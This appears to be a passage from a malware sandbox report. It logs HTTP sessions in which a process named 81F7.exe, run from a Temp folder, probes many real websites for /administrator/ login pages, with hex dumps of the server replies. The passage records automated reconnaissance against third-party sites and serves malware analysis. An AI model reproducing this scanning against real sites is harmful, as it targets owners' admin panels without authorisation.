Feb 21, 2024 00:26:06.904896021 CET	192	OUT	GET /administrator/index.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.177153111 CET	439	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:07 GMT Server: Apache Location: https://amsantechnology.com/administrator/index.php Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	52096	217.160.0.208	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631437063 CET	183	OUT	GET /administrator/ HTTP/1.1 Host: caspiantravel.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.823255062 CET	457	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 220 Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Location: http://www.caspianseagulltravels.com Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.caspianseagulltravels.com">here</a>.</p></body></html>
Feb 21, 2024 00:26:06.828222036 CET	192	OUT	GET /administrator/index.php HTTP/1.1 Host: caspiantravel.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:07.028570890 CET	457	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 220 Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Location: http://www.caspianseagulltravels.com Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.caspianseagulltravels.com">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	52112	15.197.204.56	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631488085 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.726188898 CET	224	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/administrator/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:09.643934965 CET	390	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://att.com.au/administrator/
Feb 21, 2024 00:26:09.742157936 CET	233	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/administrator/index.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	52110	59.106.13.100	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631513119 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.939969063 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:06.940577030 CET	234	OUT	GET /administrator/index.php HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://mlbx.matrix.jp/administrator/
Feb 21, 2024 00:26:07.249224901 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:07 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	52346	185.230.63.107	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631788969 CET	181	OUT	GET /administrator/ HTTP/1.1 Host: sportclinic.co.il Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.746795893 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471566.6691477841833126972 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde4MbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRalot867MtYSc3APbnkd7f9Dpb3SW7+008Ar5bJO2TG+4Wpt6ND/sSN7Q26K/LDtWcVA==,2UNV7KOq4oGjA5+PKsX47HNYW5FMKOqazjq32++LUUhYgeUJqUXtid+86vZww+nL,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,mKaRWos/zMP5pe1EkxMqWs8DqAwKLEYCI354Y33x8XA=,/j+AjfLiOiE0Vc9NsP8sK5u8Qsk402xLUnMD3SjpKh94x31OHVUG/2k0Z4Dsbv6NA62VGTLLBfcAQHnKF5lgxw== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 93 c6 4e 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f3 2b 5b 37 32 28 94 b0 65 ce cd 75 0e e5 1c 7a be a0 82 06 02 39 55 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 5b 2a b6 6c da c3 2b 3b 5c ce 4e 6d f0 5b 72 8d 45 2b 61 79 c4 8c 9d 59 ad ed a2 67 d9 04 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 e6 11 ab 1c cc f2 48 88 c5 62 91 60 2c 93 c2 d6 62 26 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 23 bc 17 bd 96 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 95 98 61 2e 78 f1 2b e8 7b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 71 7a 9e 1c 0b df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b5 e5 8a 69 69 e6 79 04 18 7f Data Ascii: 445Vo6_E-N&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>+[72(euz9UAx_:baI81\|T5[*l+;\Nm[rE+ayYgBie5TpDcHb`,b&1$$1:\|+#HN(E+9^a.x+{@?9<U_`X=`=4toVHqz@9Fc3g~6iiy
Feb 21, 2024 00:26:06.746828079 CET	630	IN	Data Raw: 4c 23 4a 7a 87 a1 01 97 47 9b 7a b9 da 10 99 f4 ac 53 41 65 74 15 9c c6 e0 6a e9 3d f2 6f 14 53 bd f5 b2 fa 9b 6f b1 07 14 5b 4a b7 e2 53 59 dc cd 9d 6d 4d 19 5f 30 e5 ff 5c 5f fc bc a1 7f 47 5b c9 53 9f d4 8c e9 c0 6e ae d9 f9 67 a4 f4 59 ca bc Data Ascii: L#JzGzSAetj=oSo[JSYmM_0\_G[SngY+(wW$E?ILrD/{Gdn\lhB_[p+tzS2?)s\0(`(9NNmK^PLVKw(M@xv";U:1k\[j_B$k%?
Feb 21, 2024 00:26:06.748013973 CET	240	OUT	GET /administrator/index.php HTTP/1.1 Host: sportclinic.co.il Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://sportclinic.co.il/administrator/
Feb 21, 2024 00:26:06.865447998 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471566.7851477841833226972 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde4MbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRalgBNTJhxT1xBW0QacJY5ItLlvYfM2ZkeLbtvhuNQ4rZHF1uafk7LeANS7S+bsnNWsQ==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,HFwuyehutl8tT21go4rzKQuGWFn2wMQWjizQyxww5Ro=,/j+AjfLiOiE0Vc9NsP8sK3wn3HKfNyHsngqdvH35wynwHI026nY8X82AVI4uc6ntz725C8t8ZYCuhGMAdFHN2Q== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 5b 6f db 36 14 7e cf af 60 f4 a2 16 08 c5 c8 b9 d8 c9 a4 00 5d d6 62 79 19 86 0d 05 36 14 45 41 4b c7 16 13 8a 54 49 2a b6 d1 f5 bf ef 1c 49 f6 9c 38 58 e3 c4 0f b6 79 c8 73 f9 ce 9d b1 ec 90 73 c6 38 bf 3a 38 c8 0e 4b 5b 84 55 03 ac 0a b5 be c2 33 e7 07 0c 3f 74 9b 11 8d 99 39 97 4d 93 47 0b b5 7c ef 9c 75 bf cb 39 f8 77 4d 13 d1 03 90 e5 15 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 9f 6c 5d 54 21 34 1c be b6 ea 3e 8f fe e2 1f df f1 6b 5b 37 32 28 94 b0 65 ce cd fb 1c ca 39 f4 7c 41 05 0d 04 72 aa 4c 99 47 71 83 f0 be 74 c4 98 fd c3 82 93 c6 6b 19 f0 71 26 3a ea 63 b8 25 f8 c2 a9 26 28 6b b6 54 6c d9 b4 87 57 76 b8 9c 9d da e0 b7 e4 1a 8b 56 c2 f2 88 19 3b b3 5a db 45 cf b2 09 28 85 2e d3 ca dc 31 0a 6a 1e a9 1a e1 88 c6 cc 23 56 39 98 e5 91 10 8b c5 22 c1 58 26 85 ad c5 4c 62 48 ac 49 f0 2b 62 0e 74 1e f9 0a 43 57 b4 81 11 7d 47 78 2f 7a 2d c9 07 74 6d 91 34 d2 49 1f ac 43 4d 9d 50 8c 1b 05 da 8b 50 29 57 72 bc 0e 2b 31 c3 5c f0 e2 57 d0 f7 80 3c b2 3b 7f 90 05 72 78 c4 d7 ab 0e 2b 0d be 02 c0 d4 e9 ad 0f b0 0c a2 7b 20 3a b7 6f c1 ec 2d d9 e1 7b ae 69 e8 00 de b4 53 ad 0a 91 26 e3 f4 22 39 16 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 0f f5 67 a2 cf fc 6c 6a cb 15 d3 d2 cc f3 08 30 fe Data Ascii: 445V[o6~`]by6EAKTI*I8Xyss8:8K[U3?t9MG\|u9wMjYC+X40XP%xw8RF%5GKUNr/E}kEE%l]T!4>k[72(e9\|ArLGqtkq&:c%&(kTlWvV;ZE(.1j#V9"X&LbHI+btCW}Gx/z-tm4ICMPP)Wr+1\W<;rx+{ :o-{iS&"9S/r$Hglj0
Feb 21, 2024 00:26:06.865469933 CET	630	IN	Data Raw: 98 46 94 f4 0e 43 03 2e 8f 36 f5 72 bd 21 32 e9 59 a7 82 ca e8 3a 38 8d c1 d5 d2 7b e4 df 28 a6 7a eb 65 f5 37 df 62 0f 28 b6 94 6e c5 a7 b2 b8 9b 3b db 9a 32 be 64 ca ff b9 be f8 79 43 ff 8e b6 92 a7 3e a9 19 d3 81 dd bc 67 17 9f 91 d2 67 29 f3 Data Ascii: FC.6r!2Y:8{(ze7b(n;2dyC>gg)$'tT-FI~ZZ=^y+(%VS/nV8d~S#`DQQrg.#Q2Ew4tbjW\|?)IQ?y_>U]K~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	52351	15.197.142.173	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631978989 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: veselcontractors.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.731913090 CET	364	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-91.ec2.internal X-Request-Id: 442925dd-e137-41ff-a1ec-630f29d258cb Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Feb 21, 2024 00:26:06.732249975 CET	246	OUT	GET /administrator/index.php HTTP/1.1 Host: veselcontractors.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://veselcontractors.com/administrator/
Feb 21, 2024 00:26:06.830236912 CET	365	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-238.ec2.internal X-Request-Id: a207cb5a-0e99-42a7-93e0-1980c7cc9330 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	52342	72.52.178.23	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.632164955 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: imailzone.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.780667067 CET	366	IN	HTTP/1.1 302 Moved Temporarily Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Cache-Control: no-cache Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:06 GMT Location: http://ww1.imailzone.com/administrator/?usid=15&utid=26948357484 Pragma: no-cache Connection: Keep-Alive X-Powered-By: PHP/5.4.16 Content-Length: 0
Feb 21, 2024 00:26:06.783915043 CET	186	OUT	GET /administrator/index.php HTTP/1.1 Host: imailzone.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.931772947 CET	376	IN	HTTP/1.1 302 Moved Temporarily Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 Cache-Control: no-cache Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:06 GMT Location: http://ww12.imailzone.com/administrator/index.php?usid=15&utid=26948357543 Pragma: no-cache Connection: Keep-Alive X-Powered-By: PHP/5.4.16 Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	52348	109.71.40.107	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.722430944 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.903342009 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:06 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 39 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 